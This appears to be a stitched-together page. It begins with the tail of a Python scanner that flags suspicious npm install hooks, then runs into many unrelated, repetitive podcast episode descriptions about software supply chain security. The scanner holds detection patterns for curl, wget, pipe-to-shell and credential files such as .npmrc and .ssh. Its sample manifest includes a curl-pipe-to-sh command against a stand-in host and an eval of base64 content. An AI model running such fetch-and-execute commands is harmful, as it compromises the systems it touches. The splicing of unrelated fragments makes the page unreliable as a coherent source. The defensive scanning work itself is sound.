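from the episode. Scans a package.json manifest for lifecycle scripts that npm
runs automatically during install and flags command patterns commonly seen in
malicious packages. Every signal here is a heuristic, not proof of malice.
"""
import json
import re

# Lifecycle scripts npm executes without any explicit user action at install time.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, pattern) pairs; each is a cheap behavioral indicator (assumed list).
SIGNALS = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b|https?://", re.I)),
    ("pipe-to-shell", re.compile(r"\|\s*(sh|bash)\b", re.I)),
    ("encoded-payload", re.compile(r"base64|atob\(", re.I)),
    ("dynamic-eval", re.compile(r"\beval\(|new Function\(", re.I)),
    ("credential-read", re.compile(r"\.npmrc|\.ssh/|\.aws/|process\.env", re.I)),
    ("inline-node", re.compile(r"\bnode\s+-e\b", re.I)),
]


def scan_manifest(manifest: dict) -> list:
    """Return one finding per install hook whose command matches any signal."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [label for label, rx in SIGNALS if rx.search(cmd)]
        if hits:
            findings.append({"hook": hook, "command": cmd, "signals": hits})
    return findings


def risk_score(findings: list) -> int:
    """Crude score: number of distinct signal kinds across all flagged hooks."""
    return len({s for f in findings for s in f["signals"]})


# Constructed sample manifests for the demo; neither is a real package.
BENIGN = {
    "name": "demo-native-addon",
    "scripts": {"test": "node test.js", "postinstall": "node scripts/build-native.js"},
}
SUSPICIOUS = {
    "name": "demo-native-addon",
    "scripts": {
        "preinstall": "curl -s https://example.invalid/x.sh | sh",
        "postinstall": "node -e \"eval(Buffer.from('aGk=', 'base64').toString())\"",
    },
}

if __name__ == "__main__":
    for manifest in (BENIGN, SUSPICIOUS):
        found = scan_manifest(manifest)
        print(manifest["name"], "score", risk_score(found))
        print(json.dumps(found, indent=2))
```

The benign manifest produces no findings and a score of 0; the suspicious one yields two findings spanning five distinct signals. Screening install hooks this way is cheap and catches a large class of npm malware, but it is only one layer: a package can misbehave at require() time rather than at install time, or hide its payload in a file the hook merely executes, which is why more thorough behavioral analysis also observes what the code does when it runs.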
In this episode, David Rubinstein interviews Brian Fox, co-founder and CTO of Sonatype. They discuss the company's 10th annual State of the Software Supply Chain report. Key talking points include:
The rapid growth of malicious open-source components
The increasing length of time needed to remediate vulnerabilities
How regulations impact supply chain security
Note: This will be the final episode of What The Dev released in 2024. We'll be back in early January 2025!
Josh and Kurt talk to Brian Fox from Sonatype and Donald Fischer from Tidelift about their recent reports as well as open source. There are really interesting connections between the two reports. The overall theme seems to be that open source is huge, everywhere, and needs help. But all is not lost! There are some great ideas on what the future needs to look like.
Show Notes: Donald Fischer; Brian Fox; Tidelift; Sonatype; The 2024 Tidelift state of the open source maintainer report; Sonatype State of the Software Supply Chain; Anchore 2024 Software Supply Chain Security Report; OpenSSF TAC issue 101
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss the top 3 tips for reducing software supply chain risk. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software transparency. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Join us this week on the AWS Developers podcast as we dive deep into CodeArtifact, AWS's fully managed artifact repository service. In this insightful discussion with the team behind CodeArtifact, we explore what makes this service essential for developers. Discover the myriad benefits it offers in terms of availability, security, and cost-efficiency. Did you know that 83% of Maven's public server bandwidth is consumed by just 1% of its client IP addresses? Utilizing a private artifact repository like CodeArtifact not only optimizes your workflows but also contributes to a more sustainable internet infrastructure. We'll also share expert insights and best practices for deploying CodeArtifact at scale, ensuring you get the most out of this powerful service. Tune in to enhance your development process and learn how to be a responsible internet citizen. With Carl Lewis and Derek Tam, Software Development Manager, AWS Links - AWS CodeArtifact https://docs.aws.amazon.com/codeartifact/latest/ug/welcome.html - Recent blog posts I wrote about CodeArtifact https://aws.amazon.com/blogs/aws/category/developer-tools/aws-code-artifact/ - 83% of maven servers bandwidth is consumed by 1% of its client IP addresses, the Sonatype blog post. https://www.sonatype.com/blog/maven-central-and-the-tragedy-of-the-commons - Carl Lewis on Linked In https://www.linkedin.com/in/carlglewis/ - Derek Tam on Linked In https://www.linkedin.com/in/derek-tam-3548987/
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss what CISOs and security teams should look for when buying IoT or OT products. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss what CISOs and security teams should look for when buying cloud products. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
In this episode of the podcast, Grizz and Eddie Knight of Sonatype return to our FINOS Debrief episodes that wrap up the past month or so in the FINOS Ecosystem - and look forward to the next month and beyond. Attend the London Open Source in Finance Forum 26 June 2024: https://events.linuxfoundation.org/open-source-finance-forum-london/ 2023 State of Open Source in Financial Services Download: https://www.finos.org/state-of-open-source-in-financial-services-2023 FINOS Current Newsletter Here: https://www.finos.org/newsletter - more show notes to come Eddie's Info | https://www.linkedin.com/in/knight1776/ Grizz's Info | https://www.linkedin.com/in/aarongriswold/ | grizz@finos.org ►► Visit FINOS www.finos.org ►► Get In Touch: info@finos.org
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss who is vulnerable to software supply chain attacks. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss whether open source code is a risk. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software supply chain security risk, and how development teams can reduce it. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss challenges in achieving secure-by-design or secure-by-default products. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss important aspects of a secure development lifecycle. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss how organizations can implement software supply chain security. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software supply chain security regulations, including whether there are any laws or standards in the industry. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Brian Fox, co-founder and CTO at Sonatype, joins host Steve Morgan to discuss software supply chain management and security. They also delve into the founding of Sonatype, the company's operations, and other related topics. Sonatype is a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software supply chain security, including what it is and why it's important. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.
In this supper club episode of Syntax, Wes and Scott talk with Darcy Clarke about his career path in tech, working with Wes back in the day, why he decided to build vlt volt, and the biggest sick pick list yet! Show Notes 00:32 Welcome 01:38 Building a tweet wall back in the day 08:54 How did you land at npm? npm 19:40 Why do we need another package manager and registry? 22:11 What is vlt volt? vlt: a new home for open source vlt /vōlt/ (@vltpkg) / X Shipping ESM with Mark Erikson Bun Yarn Nx 27:18 Do you see a future where we don't pre-compile before shipping? 29:32 Why would pnpm be faster than npm? 31:14 What are the problems with symlinking? 33:08 What's happening with Yarn? Verdaccio Cloudsmith JFrog Sonatype socket.dev Snyk.io Dependency Confusion 37:42 What do you think about config files? antfu Config of File Nesting for VS Code The massive bug at the heart of the npm ecosystem WebTorrent 41:02 VS Code tip - file nesting patterns 41:59 How does an on-prem registry work? 47:29 Where do Socket.dev and Snyk security fit? 52:46 Sick Picks 04:41 How did you get vlt.sh? 05:30 How did you get @Darcy? Sick Picks Flat Coat Goldendoodle Scientific American Nespresso BlackBerry (2023) - IMDb BlackBerry (2023) Letterboxd Matthias Wandel Blink-182 Official Site Moneen Bring Me The Horizon Shameless Plugs vlt: a new home for open source Hit us up on Socials! Syntax: X Instagram Tiktok LinkedIn Threads Wes: X Instagram Tiktok LinkedIn Threads Scott: X Instagram Tiktok LinkedIn Threads
In this episode of the podcast, Grizz sits down with Cortney Stauffer (Head of UX Practice) & Chuck Danielsson (Head of Practice, Web/UI), both from Adaptive. They talk about UX, UI, FDC3, and why things should just work. Cortney Stauffer: https://www.linkedin.com/in/cortstauffer/ Chuck Danielsson: https://www.linkedin.com/in/chuck-danielsson-2141b058/ NYC November 1 - Open Source in Finance Forum: https://events.linuxfoundation.org/open-source-finance-forum-new-york/ 2022 State of Open Source in Financial Services Download: https://www.finos.org/state-of-open-source-in-financial-services-2022 All Links on Current Newsletter Here: https://www.finos.org/newsletter - more show notes to come A huge thank you to all our sponsors for Open Source in Finance Forum New York https://events.linuxfoundation.org/open-source-finance-forum-new-york/ that will take place this November 1st at the New York Marriott Marquis. This event wouldn't be possible without our sponsors. A special thank you to our Leader sponsors: Databricks, where you can unify all your data, analytics, and AI on one platform. And Red Hat - Open to change—yesterday, today, and tomorrow. And our Contributor and Community sponsors: Adaptive/Aeron, Connectifi, Discover, Enterprise DB, FinOps Foundation, Fujitsu, instaclustr, Major League Hacking, mend.io, Open Mainframe Project, OpenJS Foundation, OpenLogic by Perforce, Orkes, Percona, Sonatype, StormForge, and Tidelift. If you would like to sponsor or learn more about this event, please send an email to sponsorships@linuxfoundation.org. Grizz's Info | https://www.linkedin.com/in/aarongriswold/ | grizz@finos.org ►► Visit FINOS www.finos.org ►► Get In Touch: info@finos.org
In this episode of the podcast, Grizz sits down with Jon Gottfried, Co-Founder of Major League Hacking. They talk about hackathons in finance, and developer/engineering talent, from both the individual and hiring manager perspectives. Jon Gottfried: https://www.linkedin.com/in/jonmarkgo/ MajorLeagueHacking: https://sponsor.mlh.io/ NYC November 1 - Open Source in Finance Forum: https://events.linuxfoundation.org/open-source-finance-forum-new-york/ 2022 State of Open Source in Financial Services Download: https://www.finos.org/state-of-open-source-in-financial-services-2022 All Links on Current Newsletter Here: https://www.finos.org/newsletter - more show notes to come A huge thank you to all our sponsors for Open Source in Finance Forum New York https://events.linuxfoundation.org/open-source-finance-forum-new-york/ that will take place this November 1st at the New York Marriott Marquis. This event wouldn't be possible without our sponsors. A special thank you to our Leader sponsors: Databricks, where you can unify all your data, analytics, and AI on one platform. And Red Hat - Open to change—yesterday, today, and tomorrow. And our Contributor and Community sponsors: Adaptive/Aeron, Connectifi, Discover, Enterprise DB, FinOps Foundation, Fujitsu, instaclustr, Major League Hacking, mend.io, Open Mainframe Project, OpenJS Foundation, OpenLogic by Perforce, Orkes, Percona, Sonatype, StormForge, and Tidelift. If you would like to sponsor or learn more about this event, please send an email to sponsorships@linuxfoundation.org. Grizz's Info | https://www.linkedin.com/in/aarongriswold/ | grizz@finos.org ►► Visit FINOS www.finos.org ►► Get In Touch: info@finos.org
In this episode of the podcast, our FINOS COO, Jane Gavronsky, sits down with Adrian Dale of ISLA and David Shone of ISDA to discuss the associations' contribution and backing of the FINOS CDM (Common Domain Model) to the FINOS open source community. CDM: https://cdm.finos.org/ On GitHub: https://github.com/finos/common-domain-model Adrian Dale, Head of Regulation & Markets, ISLA - https://www.linkedin.com/in/adrian-dale-27942314/ David Shone, Director of Product - Data & Digital, ISDA - https://www.linkedin.com/in/david-shone/ Jane Gavronsky, COO, FINOS - https://www.linkedin.com/in/janegavronsky/ NYC November 1 - Open Source in Finance Forum: https://events.linuxfoundation.org/open-source-finance-forum-new-york/ 2022 State of Open Source in Financial Services Download: https://www.finos.org/state-of-open-source-in-financial-services-2022 All Links on Current Newsletter Here: https://www.finos.org/newsletter - more show notes to come A huge thank you to all our sponsors for Open Source in Finance Forum New York https://events.linuxfoundation.org/open-source-finance-forum-new-york/ that will take place this November 1st at the New York Marriott Marquis. This event wouldn't be possible without our sponsors. A special thank you to our Leader sponsors: Databricks, where you can unify all your data, analytics, and AI on one platform. And Red Hat - Open to change—yesterday, today, and tomorrow. And our Contributor and Community sponsors: Adaptive/Aeron, Connectifi, Discover, Enterprise DB, FinOps Foundation, Fujitsu, instaclustr, Major League Hacking, mend.io, Open Mainframe Project, OpenJS Foundation, OpenLogic by Perforce, Orkes, Percona, Sonatype, StormForge, and Tidelift. If you would like to sponsor or learn more about this event, please send an email to sponsorships@linuxfoundation.org. Grizz's Info | https://www.linkedin.com/in/aarongriswold/ | grizz@finos.org ►► Visit FINOS www.finos.org ►► Get In Touch: info@finos.org
Josh and Kurt talk about Sonatype's 9th Annual State of the Software Supply Chain. There's a ton of data in the report, but the thing we want to talk about is the statistic that only 11% of open source is actually being maintained. Do we think that's true? Does it really matter? Show Notes Sonatype report ecosyste.ms GNOME libcue flaw Reality 2.0 supply chain episode
We pick back up with Joshua Corman, founder of the grassroots organization I Am the Cavalry, for part two of our discussion. Josh shares insights from his many years on the healthcare cyber front lines and provides both a captivating and sobering perspective on the state of healthcare security today. And while there have been many strides forward, we still have a long way to go. Audra and I learned so much during our discussion, including themes such as cyber asbestos, the emerging care desert, dependency on undependable things, recalibrating the cost of connected medicine, "if you can't protect it, you can't connect it," the Omnibus Appropriations Act, and actionable insights on what we can do right now, as individuals and collectively, to make a difference. Joshua Corman is the founder of I Am the Cavalry, a grassroots organization focused on the intersection of digital security, public safety, and human life. He was formerly chief strategist of CISA's COVID Task Force, where he advised on the pandemic response, provided cybersecurity expertise on healthcare infrastructure, and supported control systems and life safety initiatives. Prior to CISA, Josh was SVP and chief security officer at PTC, where he accelerated cyber safety maturity across industries. Previously, he served as director of the Atlantic Council's Cyber Statecraft Initiative, on the Congressional Task Force for Healthcare Industry Cybersecurity, and in leadership roles at Sonatype, Akamai, IBM, and the 451 Group. For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e248
We had so much to talk about with this week's guest that we made it a two-part episode! Joining us this week, and next week, is Joshua Corman, founder of the grassroots organization I Am the Cavalry. Josh shares insights from his many years on the healthcare cyber front lines and provides both a captivating and sobering perspective on the state of healthcare security today. And while there have been many strides forward, we still have a long way to go. Audra and I learned so much during our discussion, including themes such as cyber asbestos, the emerging care desert, dependency on undependable things, recalibrating the cost of connected medicine, "if you can't protect it, you can't connect it," the Omnibus Appropriations Act, and actionable insights on what we can do right now, as individuals and collectively, to make a difference. Joshua Corman is the founder of I Am the Cavalry, a grassroots organization focused on the intersection of digital security, public safety, and human life. He was formerly chief strategist of CISA's COVID Task Force, where he advised on the pandemic response, provided cybersecurity expertise on healthcare infrastructure, and supported control systems and life safety initiatives. Prior to CISA, Josh was SVP and chief security officer at PTC, where he accelerated cyber safety maturity across industries. Previously, he served as director of the Atlantic Council's Cyber Statecraft Initiative, on the Congressional Task Force for Healthcare Industry Cybersecurity, and in leadership roles at Sonatype, Akamai, IBM, and the 451 Group. For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e247